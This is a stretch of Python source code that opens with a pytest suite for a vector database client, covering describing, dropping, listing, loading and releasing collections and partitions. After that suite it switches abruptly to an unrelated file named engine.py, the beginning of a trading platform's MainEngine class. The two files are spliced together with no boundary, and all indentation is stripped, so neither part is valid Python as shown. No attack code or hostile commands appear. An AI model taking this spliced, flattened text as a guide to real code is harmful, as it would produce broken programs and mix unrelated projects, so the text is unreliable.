assert index["metric_type"] == get_simple_index["metric_type"]
assert index["params"] == get_simple_index["params"]
@pytest.mark.tags(CaseLabel.L2)
def test_describe_collection_without_connection(self, collection, dis_connect):
"""
target: test get collection info, without connection
method: calling get collection info with correct params, with a disconnected instance
expected: get collection info raise exception
"""
with pytest.raises(Exception) as e:
dis_connect.describe_collection(collection)
@pytest.mark.tags(CaseLabel.L0)
def test_describe_collection_not_existed(self, connect):
"""
target: test describe collection which has been dropped
method: generate a random collection name, create the collection, describe it, drop it,
then call describe_collection again
expected: raise exception
"""
collection_name = gen_unique_str(uid_describe)
connect.create_collection(collection_name, cons.default_fields)
connect.describe_collection(collection_name)
connect.drop_collection(collection_name)
try:
connect.describe_collection(collection_name)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "DescribeCollection failed: can't find collection: %s" % collection_name
@pytest.mark.tags(CaseLabel.L2)
def test_describe_collection_multithread(self, connect):
"""
target: test create collection with multi-thread
method: create collection using multi-thread,
expected: collections are created
"""
threads_num = 4
threads = []
collection_name = gen_unique_str(uid_describe)
connect.create_collection(collection_name, cons.default_fields)
def get_info():
connect.describe_collection(collection_name)
for i in range(threads_num):
t = MyThread(target=get_info)
threads.append(t)
t.start()
time.sleep(0.2)
for t in threads:
t.join()
"""
******************************************************************
The following cases are used to test `describe_collection` function, and insert data in collection
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L0)
def test_describe_collection_fields_after_insert(self, connect, get_filter_field, get_vector_field):
"""
target: test create normal collection with different fields, check info returned
method: create collection with diff fields: metric/field_type/..., calling `describe_collection`
expected: no exception raised, and value returned correct
"""
filter_field = get_filter_field
vector_field = get_vector_field
collection_name = gen_unique_str(uid_describe)
fields = {
"fields": [gen_primary_field(), filter_field, vector_field],
# "segment_row_limit": default_segment_row_limit
}
connect.create_collection(collection_name, fields)
entities = gen_entities_by_fields(fields["fields"], default_nb, vector_field["params"]["dim"])
res_ids = connect.insert(collection_name, entities)
connect.flush([collection_name])
res = connect.describe_collection(collection_name)
# assert res['segment_row_limit'] == default_segment_row_limit
assert len(res["fields"]) == len(fields.get("fields"))
for field in res["fields"]:
if field["type"] == filter_field:
assert field["name"] == filter_field["name"]
elif field["type"] == vector_field:
assert field["name"] == vector_field["name"]
assert field["params"] == vector_field["params"]
class TestDescribeCollectionInvalid(object):
"""
Test describe collection with invalid params
"""
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_collection_name(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L2)
def test_describe_collection_with_invalid_collection_name(self, connect, get_collection_name):
"""
target: test describe collection which name invalid
method: call describe_collection with invalid names
expected: raise exception
"""
collection_name = get_collection_name
with pytest.raises(Exception) as e:
connect.describe_collection(collection_name)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("collection_name", ('', None))
def test_describe_collection_with_empty_or_None_collection_name(self, connect, collection_name):
"""
target: test describe collection which name is empty or None
method: call describe_collection with '' or None name
expected: raise exception
"""
with pytest.raises(Exception) as e:
connect.describe_collection(collection_name)
class TestDropCollection:
"""
******************************************************************
The following cases are used to test `drop_collection` function
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L0)
def test_drop_collection_A(self, connect, collection):
"""
target: test delete collection created with correct params
method: create collection and then delete,
assert the value returned by delete method
expected: status ok, and no collection in collections
"""
connect.drop_collection(collection)
time.sleep(2)
assert not connect.has_collection(collection)
@pytest.mark.tags(CaseLabel.L2)
def test_drop_collection_without_connection(self, collection, dis_connect):
"""
target: test describe collection, without connection
method: drop collection with correct params, with a disconnected instance
expected: drop raise exception
"""
with pytest.raises(Exception) as e:
dis_connect.drop_collection(collection)
@pytest.mark.tags(CaseLabel.L0)
def test_drop_collection_not_existed(self, connect):
"""
target: test drop collection which was never created
method: generate a random collection name that does not exist in the db,
then call drop_collection and check the exception raised
expected: raise exception
"""
collection_name = gen_unique_str(uid_drop)
try:
connect.drop_collection(collection_name)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "DescribeCollection failed: can't find collection: %s" % collection_name
@pytest.mark.tags(CaseLabel.L2)
def test_create_drop_collection_multithread(self, connect):
"""
target: test create and drop collection with multi-thread
method: create and drop collection using multi-thread,
expected: collections are created, and dropped
"""
threads_num = 8
threads = []
collection_names = []
def create():
collection_name = gen_unique_str(uid_drop)
collection_names.append(collection_name)
connect.create_collection(collection_name, cons.default_fields)
connect.drop_collection(collection_name)
for i in range(threads_num):
t = MyThread(target=create, args=())
threads.append(t)
t.start()
time.sleep(0.2)
for t in threads:
t.join()
for item in collection_names:
assert not connect.has_collection(item)
class TestDropCollectionInvalid(object):
"""
Test drop collection with invalid params
"""
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_collection_name(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L2)
def test_drop_collection_with_invalid_collection_name(self, connect, get_collection_name):
"""
target: test drop invalid collection
method: drop collection with invalid collection name
expected: raise exception
"""
collection_name = get_collection_name
with pytest.raises(Exception) as e:
connect.drop_collection(collection_name)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("collection_name", ('', None))
def test_drop_collection_with_empty_or_None_collection_name(self, connect, collection_name):
"""
target: test drop invalid collection
method: drop collection with empty or None collection name
expected: raise exception
"""
with pytest.raises(Exception) as e:
connect.drop_collection(collection_name)
class TestHasCollection:
"""
******************************************************************
The following cases are used to test `has_collection` function
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L2)
def test_has_collection_without_connection(self, collection, dis_connect):
"""
target: test has collection, without connection
method: calling has collection with correct params, with a disconnected instance
expected: has collection raise exception
"""
with pytest.raises(Exception) as e:
assert dis_connect.has_collection(collection)
@pytest.mark.tags(CaseLabel.L0)
def test_has_collection_not_existed(self, connect):
"""
target: test has_collection after the collection is dropped
method: generate a random collection name, create the collection, then drop it,
and check the value returned by has_collection
expected: False
"""
collection_name = gen_unique_str(uid_has)
connect.create_collection(collection_name, cons.default_fields)
assert connect.has_collection(collection_name)
connect.drop_collection(collection_name)
assert not connect.has_collection(collection_name)
@pytest.mark.tags(CaseLabel.L2)
def test_has_collection_multithread(self, connect):
"""
target: test create collection with multi-thread
method: create collection using multi-thread,
expected: collections are created
"""
threads_num = 4
threads = []
collection_name = gen_unique_str(uid_has)
connect.create_collection(collection_name, cons.default_fields)
def has():
assert connect.has_collection(collection_name)
# assert not assert_collection(connect, collection_name)
for i in range(threads_num):
t = MyThread(target=has, args=())
threads.append(t)
t.start()
time.sleep(0.2)
for t in threads:
t.join()
class TestHasCollectionInvalid(object):
"""
Test has collection with invalid params
"""
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_collection_name(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L2)
def test_has_collection_with_invalid_collection_name(self, connect, get_collection_name):
"""
target: test has collection with invalid scenario
method: call has_collection with an invalid collection name
expected: raise exception
"""
collection_name = get_collection_name
with pytest.raises(Exception) as e:
connect.has_collection(collection_name)
@pytest.mark.tags(CaseLabel.L2)
def test_has_collection_with_empty_collection_name(self, connect):
"""
target: test has collection with invalid scenario
method: call has_collection with an empty collection name
expected: raise exception
"""
collection_name = ''
with pytest.raises(Exception) as e:
connect.has_collection(collection_name)
@pytest.mark.tags(CaseLabel.L2)
def test_has_collection_with_none_collection_name(self, connect):
"""
target: test has collection with invalid scenario
method: call has_collection with None as the collection name
expected: raise exception
"""
collection_name = None
with pytest.raises(Exception) as e:
connect.has_collection(collection_name)
class TestListCollections:
"""
******************************************************************
The following cases are used to test `list_collections` function
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L0)
def test_list_collections_multi_collections(self, connect):
"""
target: test list collections
method: create collection, assert the value returned by list_collections method
expected: True
"""
collection_num = 50
collection_names = []
for i in range(collection_num):
collection_name = gen_unique_str(uid_list)
collection_names.append(collection_name)
connect.create_collection(collection_name, cons.default_fields)
assert collection_name in connect.list_collections()
for i in range(collection_num):
connect.drop_collection(collection_names[i])
@pytest.mark.tags(CaseLabel.L2)
def test_list_collections_without_connection(self, dis_connect):
"""
target: test list collections, without connection
method: calling list collections with correct params, with a disconnected instance
expected: list collections raise exception
"""
with pytest.raises(Exception) as e:
dis_connect.list_collections()
# TODO: make sure to run this case in the end
@pytest.mark.skip("r0.3-test")
@pytest.mark.tags(CaseLabel.L2)
def test_list_collections_no_collection(self, connect):
"""
target: test show collections is correct or not, if no collection in db
method: delete all collections,
assert the value returned by list_collections method is equal to []
expected: the status is ok, and the result is equal to []
"""
result = connect.list_collections()
if result:
for collection_name in result:
assert connect.has_collection(collection_name)
@pytest.mark.tags(CaseLabel.L2)
def test_list_collections_multithread(self, connect):
"""
target: test list collection with multi-threads
method: list collection using multi-threads
expected: list collections correctly
"""
threads_num = 10
threads = []
collection_name = gen_unique_str(uid_list)
connect.create_collection(collection_name, cons.default_fields)
def _list():
assert collection_name in connect.list_collections()
for i in range(threads_num):
t = MyThread(target=_list)
threads.append(t)
t.start()
time.sleep(0.2)
for t in threads:
t.join()
class TestLoadCollection:
"""
******************************************************************
The following cases are used to test `load_collection` function
******************************************************************
"""
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
return request.param
@pytest.fixture(
scope="function",
params=gen_binary_index()
)
def get_binary_index(self, request, connect):
return request.param
@pytest.mark.tags(CaseLabel.L0)
def test_load_collection_after_index(self, connect, collection, get_simple_index):
"""
target: test load collection, after index created
method: insert and create index, load collection with correct params
expected: no error raised
"""
connect.insert(collection, cons.default_entities)
connect.flush([collection])
connect.create_index(collection, default_float_vec_field_name, get_simple_index)
connect.load_collection(collection)
connect.release_collection(collection)
@pytest.mark.tags(CaseLabel.L2)
def test_load_collection_after_index_binary(self, connect, binary_collection, get_binary_index):
"""
target: test load binary_collection, after index created
method: insert and create index, load binary_collection with correct params
expected: no error raised
"""
result = connect.insert(binary_collection, cons.default_binary_entities)
assert len(result.primary_keys) == default_nb
connect.flush([binary_collection])
for metric_type in binary_metrics():
get_binary_index["metric_type"] = metric_type
connect.drop_index(binary_collection, default_binary_vec_field_name)
if get_binary_index["index_type"] == "BIN_IVF_FLAT" and metric_type in structure_metrics():
with pytest.raises(Exception) as e:
connect.create_index(binary_collection, default_binary_vec_field_name, get_binary_index)
else:
connect.create_index(binary_collection, default_binary_vec_field_name, get_binary_index)
index = connect.describe_index(binary_collection, "")
create_target_index(get_binary_index, default_binary_vec_field_name)
assert index == get_binary_index
connect.load_collection(binary_collection)
connect.release_collection(binary_collection)
@pytest.mark.tags(CaseLabel.L0)
def test_load_empty_collection(self, connect, collection):
"""
target: test load an empty collection with no data inserted
method: no entities in collection, load and release the collection
expected: load and release successfully
"""
connect.load_collection(collection)
connect.release_collection(collection)
@pytest.mark.tags(CaseLabel.L2)
def test_load_collection_dis_connect(self, dis_connect, collection):
"""
target: test load collection, without connection
method: load collection with correct params, with a disconnected instance
expected: load raise exception
"""
with pytest.raises(Exception) as e:
dis_connect.load_collection(collection)
@pytest.mark.tags(CaseLabel.L2)
def test_release_collection_dis_connect(self, dis_connect, collection):
"""
target: test release collection, without connection
method: release collection with correct params, with a disconnected instance
expected: release raise exception
"""
with pytest.raises(Exception) as e:
dis_connect.release_collection(collection)
@pytest.mark.tags(CaseLabel.L2)
def test_load_collection_not_existed(self, connect, collection):
"""
target: test load invalid collection
method: load not existed collection
expected: raise exception
"""
collection_name = gen_unique_str(uid_load)
try:
connect.load_collection(collection_name)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "DescribeCollection failed: can't find collection: %s" % collection_name
@pytest.mark.tags(CaseLabel.L2)
def test_release_collection_not_existed(self, connect, collection):
"""
target: test release a not existed collection
method: release with a not existed collection name
expected: raise exception
"""
collection_name = gen_unique_str(uid_load)
try:
connect.release_collection(collection_name)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "DescribeCollection failed: can't find collection: %s" % collection_name
@pytest.mark.tags(CaseLabel.L0)
def test_release_collection_not_load(self, connect, collection):
"""
target: test release collection without load
method: release collection without load
expected: release successfully
"""
result = connect.insert(collection, cons.default_entities)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
connect.release_collection(collection)
@pytest.mark.tags(CaseLabel.L0)
def test_load_collection_after_load_release(self, connect, collection):
"""
target: test load collection after load and release
method: 1.load and release collection after entities flushed
2.re-load collection
expected: No exception
"""
result = connect.insert(collection, cons.default_entities)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
connect.load_collection(collection)
connect.release_collection(collection)
connect.load_collection(collection)
@pytest.mark.tags(CaseLabel.L2)
def test_load_collection_repeatedly(self, connect, collection):
"""
target: test load collection repeatedly
method: load collection twice
expected: No exception
"""
result = connect.insert(collection, cons.default_entities)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
connect.load_collection(collection)
connect.load_collection(collection)
@pytest.mark.tags(CaseLabel.L2)
def test_load_release_collection(self, connect, collection):
"""
target: test load, release non-exist collection
method: 1. load, release and drop collection
2. load and release dropped collection
expected: raise exception
"""
collection_name = gen_unique_str(uid_load)
connect.create_collection(collection_name, cons.default_fields)
connect.insert(collection_name, cons.default_entities)
connect.flush([collection_name])
connect.load_collection(collection_name)
connect.release_collection(collection_name)
connect.drop_collection(collection_name)
try:
connect.load_collection(collection_name)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "DescribeCollection failed: can't find collection: %s" % collection_name
try:
connect.release_collection(collection_name)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "DescribeCollection failed: can't find collection: %s" % collection_name
@pytest.mark.tags(CaseLabel.L0)
def test_release_collection_after_drop(self, connect, collection):
"""
target: test release collection after drop
method: insert and flush, then release collection after load and drop
expected: raise exception
"""
result = connect.insert(collection, cons.default_entities)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
connect.load_collection(collection)
connect.drop_collection(collection)
try:
connect.release_collection(collection)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "DescribeCollection failed: can't find collection: %s" % collection
@pytest.mark.tags(CaseLabel.L0)
def test_load_collection_without_flush(self, connect, collection):
"""
target: test load collection without flush
method: insert entities without flush, then load collection
expected: No exception and data can be queried
"""
result = connect.insert(collection, gen_entities(100))
assert len(result.primary_keys) == 100
connect.load_collection(collection)
int_field_name = "int64"
term_expr = f'{int_field_name} in {result.primary_keys[:1]}'
res = connect.query(collection, term_expr)
assert res == [{int_field_name: result.primary_keys[0]}]
# TODO
@pytest.mark.tags(CaseLabel.L2)
def _test_load_collection_larger_than_memory(self):
"""
target: test load collection when memory less than collection size
method: not determined yet (requires a collection larger than available memory)
expected: raise exception
"""
@pytest.mark.tags(CaseLabel.L0)
def test_load_collection_release_part_partitions(self, connect, collection):
"""
target: test release part partitions after load collection
method: load collection and release part partitions
expected: released partitions search empty
"""
result = connect.insert(collection, cons.default_entities)
assert len(result.primary_keys) == default_nb
connect.create_partition(collection, default_tag)
result = connect.insert(collection, cons.default_entities, partition_name=default_tag)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
connect.load_collection(collection)
connect.release_partitions(collection, [default_tag])
with pytest.raises(Exception) as e:
connect.search(collection, **default_single_query, partition_names=[default_tag])
res = connect.search(collection, **default_single_query, partition_names=[default_partition_name])
assert len(res[0]) == default_top_k
@pytest.mark.tags(CaseLabel.L2)
def test_load_collection_release_all_partitions(self, connect, collection):
"""
target: test release all partitions after load collection
method: load collection and release all partitions
expected: search empty
"""
result = connect.insert(collection, cons.default_entities)
assert len(result.primary_keys) == default_nb
connect.create_partition(collection, default_tag)
result = connect.insert(collection, cons.default_entities, partition_name=default_tag)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
connect.load_collection(collection)
connect.release_partitions(collection, [default_partition_name, default_tag])
res = connect.search(collection, **default_single_query)
assert len(res[0]) == 0
@pytest.mark.tags(CaseLabel.L0)
def test_load_partitions_release_collection(self, connect, collection):
"""
target: test release collection after load partitions
method: insert entities into partitions, search empty after load partitions and release collection
expected: search result empty
"""
connect.create_partition(collection, default_tag)
result = connect.insert(collection, cons.default_entities, partition_name=default_tag)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
connect.load_partitions(collection, [default_tag])
connect.release_collection(collection)
with pytest.raises(Exception):
connect.search(collection, **default_single_query)
class TestReleaseAdvanced:
@pytest.mark.tags(CaseLabel.L0)
def test_release_collection_during_searching(self, connect, collection):
"""
target: test release collection during searching
method: insert entities into collection, flush and load collection, release collection during searching
expected: raise exception
"""
nq = 1000
top_k = 1
connect.insert(collection, cons.default_entities)
connect.flush([collection])
connect.load_collection(collection)
params, _ = gen_search_vectors_params(field_name, cons.default_entities, top_k, nq)
future = connect.search(collection, **params, _async=True)
connect.release_collection(collection)
with pytest.raises(Exception):
connect.search(collection, **default_single_query)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.skip(reason="issue 12259")
def test_release_partition_during_searching(self, connect, collection):
"""
target: test release partition during searching
method: insert entities into partition, flush and load partition, release partition during searching
expected: raise exception
"""
nq = 1000
top_k = 1
connect.create_partition(collection, default_tag)
query, _ = gen_search_vectors_params(field_name, cons.default_entities, top_k, nq)
connect.insert(collection, cons.default_entities, partition_name=default_tag)
connect.flush([collection])
connect.load_partitions(collection, [default_tag])
res = connect.search(collection, **query, _async=True)
connect.release_partitions(collection, [default_tag])
res = connect.search(collection, **default_single_query)
assert len(res[0]) == 0
@pytest.mark.tags(CaseLabel.L0)
def test_release_collection_during_searching_A(self, connect, collection):
"""
target: test release collection during searching
method: insert entities into partition, flush and load partition, release collection during searching
expected: raise exception
"""
nq = 1000
top_k = 1
connect.create_partition(collection, default_tag)
query, _ = gen_search_vectors_params(field_name, cons.default_entities, top_k, nq)
connect.insert(collection, cons.default_entities, partition_name=default_tag)
connect.flush([collection])
connect.load_partitions(collection, [default_tag])
res = connect.search(collection, **query, _async=True)
connect.release_collection(collection)
with pytest.raises(Exception):
connect.search(collection, **default_single_query)
def _test_release_collection_during_loading(self, connect, collection):
"""
target: test release collection during loading
method: insert entities into collection, flush, release collection during loading
expected: raise exception
"""
connect.insert(collection, cons.default_entities)
connect.flush([collection])
def load():
connect.load_collection(collection)
t = threading.Thread(target=load, args=())
t.start()
connect.release_collection(collection)
with pytest.raises(Exception):
connect.search(collection, **default_single_query)
def _test_release_partition_during_loading(self, connect, collection):
"""
target: test release partition during loading
method: insert entities into partition, flush, release partition during loading
expected: search on the released partition returns empty results
"""
connect.create_partition(collection, default_tag)
connect.insert(collection, cons.default_entities, partition_name=default_tag)
connect.flush([collection])
def load():
connect.load_collection(collection)
t = threading.Thread(target=load, args=())
t.start()
connect.release_partitions(collection, [default_tag])
res = connect.search(collection, **default_single_query)
assert len(res[0]) == 0
def _test_release_collection_during_inserting(self, connect, collection):
"""
target: test release collection during inserting
method: load collection, do release collection during inserting
expected: raise exception
"""
connect.insert(collection, cons.default_entities)
connect.flush([collection])
connect.load_collection(collection)
def insert():
connect.insert(collection, cons.default_entities)
t = threading.Thread(target=insert, args=())
t.start()
connect.release_collection(collection)
with pytest.raises(Exception):
res = connect.search(collection, **default_single_query)
def _test_release_collection_during_indexing(self, connect, collection):
"""
target: test release collection during building index
method: insert and flush, load collection, do release collection during creating index
expected:
"""
pass
def _test_release_collection_during_droping_index(self, connect, collection):
"""
target: test release collection during dropping index
method: insert, create index and flush, load collection, do release collection during dropping index
expected:
"""
pass
class TestLoadCollectionInvalid(object):
"""
Test load collection with invalid params
"""
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_collection_name(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L2)
def test_load_collection_with_invalid_collection_name(self, connect, get_collection_name):
"""
target: test load invalid collection
method: load collection with invalid name
expected: raise exception
"""
collection_name = get_collection_name
with pytest.raises(Exception) as e:
connect.load_collection(collection_name)
@pytest.mark.tags(CaseLabel.L2)
def test_release_collection_with_invalid_collection_name(self, connect, get_collection_name):
"""
target: test release invalid collection
method: release collection with invalid name
expected: raise exception
"""
collection_name = get_collection_name
with pytest.raises(Exception) as e:
connect.release_collection(collection_name)
class TestLoadPartition:
"""
******************************************************************
The following cases are used to test `load_partitions` function
******************************************************************
"""
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
# if str(connect._cmd("mode")) == "CPU":
# if request.param["index_type"] in index_cpu_not_support():
# pytest.skip("sq8h not support in cpu mode")
return request.param
@pytest.fixture(
scope="function",
params=gen_binary_index()
)
def get_binary_index(self, request, connect):
logging.getLogger().info(request.param)
if request.param["index_type"] in binary_support():
return request.param
else:
pytest.skip("Skip index Temporary")
@pytest.mark.tags(CaseLabel.L0)
def test_load_partition_after_index_binary(self, connect, binary_collection, get_binary_index):
"""
target: test load binary_collection, after index created
method: insert and create index, load binary_collection with correct params
expected: no error raised
"""
connect.create_partition(binary_collection, default_tag)
result = connect.insert(binary_collection, cons.default_binary_entities, partition_name=default_tag)
assert len(result.primary_keys) == default_nb
connect.flush([binary_collection])
for metric_type in binary_metrics():
logging.getLogger().info(metric_type)
get_binary_index["metric_type"] = metric_type
if get_binary_index["index_type"] == "BIN_IVF_FLAT" and metric_type in structure_metrics():
with pytest.raises(Exception) as e:
connect.create_index(binary_collection, default_binary_vec_field_name, get_binary_index)
else:
connect.create_index(binary_collection, default_binary_vec_field_name, get_binary_index)
connect.load_partitions(binary_collection, [default_tag])
@pytest.mark.tags(CaseLabel.L2)
def test_load_partitions_dis_connect(self, connect, dis_connect, collection):
"""
target: test load partitions, without connection
method: load partitions with correct params, with a disconnected instance
expected: load raise exception
"""
connect.create_partition(collection, default_tag)
with pytest.raises(Exception) as e:
dis_connect.load_partitions(collection, [default_tag])
@pytest.mark.tags(CaseLabel.L2)
def test_release_partition_dis_connect(self, connect, dis_connect, collection):
"""
target: test release collection, without connection
method: release collection with correct params, with a disconnected instance
expected: release raise exception
"""
connect.create_partition(collection, default_tag)
connect.load_partitions(collection, [default_tag])
with pytest.raises(Exception) as e:
dis_connect.release_partitions(collection, [default_tag])
@pytest.mark.tags(CaseLabel.L0)
def test_load_partition_not_existed(self, connect, collection):
"""
target: test load partition for invalid scenario
method: load not existed partition
expected: raise exception and report the error
"""
partition_name = gen_unique_str(uid_load)
try:
connect.load_partitions(collection, [partition_name])
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "partitionID of partitionName:%s can not be find" % partition_name
@pytest.mark.tags(CaseLabel.L0)
def test_release_partition_not_load(self, connect, collection):
"""
target: test release partition without load
method: release partition without load
expected: raise exception
"""
connect.create_partition(collection, default_tag)
result = connect.insert(collection, cons.default_entities, partition_name=default_tag)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
connect.release_partitions(collection, [default_tag])
@pytest.mark.tags(CaseLabel.L2)
def test_load_release_after_drop(self, connect, collection):
"""
target: test load and release partition after drop
method: drop partition and then load and release it
expected: raise exception
"""
connect.create_partition(collection, default_tag)
result = connect.insert(collection, cons.default_entities, partition_name=default_tag)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
connect.load_partitions(collection, [default_tag])
connect.release_partitions(collection, [default_tag])
connect.drop_partition(collection, default_tag)
try:
connect.load_partitions(collection, [default_tag])
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "partitionID of partitionName:%s can not be find" % default_tag
try:
connect.release_partitions(collection, [default_tag])
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "partitionID of partitionName:%s can not be find" % default_tag
@pytest.mark.tags(CaseLabel.L0)
def test_release_partition_after_drop(self, connect, collection):
"""
target: test load partition after the partition is dropped
method: create partition, insert and flush, load the partition, drop it, then load it again
expected: raise exception
"""
connect.create_partition(collection, default_tag)
result = connect.insert(collection, cons.default_entities, partition_name=default_tag)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
connect.load_partitions(collection, [default_tag])
connect.drop_partition(collection, default_tag)
try:
connect.load_partitions(collection, [default_tag])
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "partitionID of partitionName:%s can not be find" % default_tag
@pytest.mark.tags(CaseLabel.L0)
def test_load_release_after_collection_drop(self, connect, collection):
"""
target: test load and release partition after the collection is dropped
method: load and release the partition, drop the collection, then load and release the partition again
expected: raise exception
"""
connect.create_partition(collection, default_tag)
result = connect.insert(collection, cons.default_entities, partition_name=default_tag)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
connect.load_partitions(collection, [default_tag])
connect.release_partitions(collection, [default_tag])
connect.drop_collection(collection)
try:
connect.load_partitions(collection, [default_tag])
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "DescribeCollection failed: can't find collection: %s" % collection
try:
connect.release_partitions(collection, [default_tag])
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "DescribeCollection failed: can't find collection: %s" % collection
class TestLoadPartitionInvalid(object):
"""
Test load partition with invalid params
"""
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_partition_name(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L2)
def test_load_partition_with_invalid_partition_name(self, connect, collection, get_partition_name):
"""
target: test load invalid partition
method: load partition with invalid partition name
expected: raise exception
"""
partition_name = get_partition_name
with pytest.raises(Exception) as e:
connect.load_partitions(collection, [partition_name])
@pytest.mark.tags(CaseLabel.L2)
def test_release_partition_with_invalid_partition_name(self, connect, collection, get_partition_name):
"""
target: test release invalid partition
method: release partition with invalid partition name
expected: raise exception
"""
partition_name = get_partition_name
with pytest.raises(Exception) as e:
connect.release_partitions(collection, [partition_name])
engine.py
"""
"""
import logging
from logging import Logger
import smtplib
import os
from abc import ABC
from datetime import datetime
from email.message import EmailMessage
from queue import Empty, Queue
from threading import Thread
from typing import Any, Sequence, Type, Dict, List, Optional
from vnpy.event import Event, EventEngine
from .app import BaseApp
from .event import (
EVENT_TICK,
EVENT_ORDER,
EVENT_TRADE,
EVENT_POSITION,
EVENT_ACCOUNT,
EVENT_CONTRACT,
EVENT_LOG
)
from .gateway import BaseGateway
from .object import (
Direction,
Exchange,
CancelRequest,
LogData,
OrderRequest,
SubscribeRequest,
HistoryRequest,
OrderData,
BarData,
TickData,
TradeData,
PositionData,
AccountData,
ContractData
)
from .setting import SETTINGS
from .utility import get_folder_path, TRADER_DIR
# Dedicated per-engine logger module
from .util_logger import setup_logger
class MainEngine:
"""
Acts as the core of VN Trader.
"""
def __init__(self, event_engine: EventEngine = None):
""""""
if event_engine:
self.event_engine: EventEngine = event_engine
else:
self.event_engine = EventEngine()
self.event_engine.start()
self.gateways: Dict[str, BaseGateway] = {}
self.engines: Dict[str, BaseEngine] = {}
self.apps: Dict[str, BaseApp] = {}
self.exchanges: List[Exchange] = []
self.rm_engine = None
self.algo_engine = None
self.rpc_service = None
os.chdir(TRADER_DIR) # Change working directory
self.init_engines() # Initialize function engines
def add_engine(self, engine_class: Any) -> "BaseEngine":
"""
Add function engine.
"""
engine = engine_class(self, self.event_engine)
self.engines[engine.engine_name] = engine
return engine
def add_gateway(self, gateway_class: Type[BaseGateway], gateway_name: str = None) -> BaseGateway:
"""
Add gateway.
"""
if gateway_name:
# Use the specified gateway_name, so gateways of the same interface but different accounts can be connected at the same time
gateway = gateway_class(self.event_engine, gateway_name=gateway_name)
else:
# By default, use the gateway_name defined by the gateway interface itself
gateway = gateway_class(self.event_engine)
gateway_name = gateway.gateway_name
self.gateways[gateway_name] = gateway
# Add gateway supported exchanges into engine
for exchange in gateway.exchanges:
if exchange not in self.exchanges:
self.exchanges.append(exchange)
return gateway
def add_app(self, app_class: Type[BaseApp]) -> "BaseEngine":
"""
Add app.
"""
app = app_class()
self.apps[app.app_name] = app
engine = self.add_engine(app.engine_class)
if app.app_name == "RiskManager":
self.rm_engine = engine
elif app.app_name == "AlgoTrading":
self.algo_engine = engine
elif app.app_name == 'RpcService':
self.rpc_service = engine
return engine
def init_engines(self) -> None:
"""
Init all engines.
"""
self.add_engine(LogEngine)
self.add_engine(OmsEngine)
self.add_engine(EmailEngine)
def write_log(self, msg: str, source: str = "") -> None:
"""
Put log event with specific message.
"""
log = LogData(msg=msg, gateway_name=source)
event = Event(EVENT_LOG, log)
self.event_engine.put(event)
def get_gateway(self, gateway_name: str) -> BaseGateway:
"""
Return gateway object by name.
"""
gateway = self.gateways.get(gateway_name, None)
if not gateway:
self.write_log(f"找不到底层接口:{gateway_name}")
return gateway
def get_engine(self, engine_name: str) -> "BaseEngine":
"""
Return engine object by name.
"""
engine = self.engines.get(engine_name, None)
if not engine:
self.write_log(f"找不到引擎:{engine_name}")
return engine
def get_default_setting(self, gateway_name: str) -> Optional[Dict[str, Any]]:
"""
Get default setting dict of a specific gateway.
"""
gateway = self.get_gateway(gateway_name)
if gateway:
return gateway.get_default_setting()
return None
